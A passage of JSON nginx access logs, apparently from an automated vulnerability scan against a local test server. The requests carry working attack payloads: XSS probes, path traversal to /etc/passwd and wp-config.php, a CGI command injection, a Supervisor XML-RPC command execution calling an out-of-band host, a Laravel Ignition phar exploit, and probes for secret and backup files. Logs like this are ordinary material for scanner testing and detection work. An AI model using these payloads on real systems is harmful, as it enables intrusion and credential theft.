Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /trace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cgoogle.com/evil.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup c9v8h8gsmpv8c1qg07h03w91rf5zf4h5r.oast.fun\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phppgadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Grimag/go.php?https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /artifactory/ui/repodata?deploy=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NON_EXISTING_PATH/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config-sample.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/manager HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:48 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 